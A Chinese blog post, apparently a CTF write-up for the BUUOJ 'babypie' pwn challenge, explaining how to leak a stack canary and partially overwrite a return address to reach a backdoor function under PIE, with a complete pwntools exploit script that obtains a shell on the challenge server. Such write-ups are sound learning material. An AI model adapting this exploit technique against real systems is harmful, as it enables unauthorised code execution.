buuoj刷题记录 - linkctf_2018.7_babypie

Suspend.

于 2022-03-18 19:18:37 发布

阅读量281

点赞数

分类专栏： pwn入门文章标签：安全

本文链接：https://blog.csdn.net/qq_34010404/article/details/123582428

版权

pwn入门专栏收录该内容

18 篇文章 2 订阅

订阅专栏

检查程序保护：
在这里插入图片描述

拖进IDA看一下,只有一小段代码,存在溢出漏洞
在这里插入图片描述
main函数上面有个后门函数

覆盖ret地址到后门函数即可,由于开启了PIE,和Canary，不能直接溢出

下面这两行代码可以把canary打出来
在这里插入图片描述
最后由于后门函数入口地址和返回地址只有低字节不同，所以覆盖掉返回地址的低字节即可.，不需要获取程序基址.

exp:

from pwn import*
#sh = process('./pwn')
sh = remote('node4.buuoj.cn',29231)
payload = b'a' * 41

#先把canary搞出来
sh.sendafter(b'Input your Name:\n',payload)
sh.recv(6 + 40)
canary = u64(sh.recv(8)) & (0xffffffffffffff00)
log.success('canary:%x \n',canary)
payload = b'a' * 40 + p64(canary) + p64(0) + b'\x42'
#gdb.attach(sh)
sh.send(payload)
sh.interactive()

(如果由于栈未对齐导致getshell失败的话，可以把入口地址设置为push rbp下面的地址.)

成功getshell:
在这里插入图片描述

Suspend.

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
buuoj刷题记录 - linkctf_2018.7_babypie

检查程序保护：拖进IDA看一下,只有一小段代码,存在溢出漏洞main函数上面有个后门函数覆盖ret地址到后门函数即可,由于开启了PIE,和Canary，不能直接溢出下面这两行代码可以把canary打出来最后由于后门函数入口地址和返回地址只有低字节不同，所以覆盖掉返回地址的低字节即可.，不需要获取程序基址.exp:from pwn import*#sh = process('./pwn')sh = remote('node4.buuoj.cn',29231)payload = b'
复制链接

扫一扫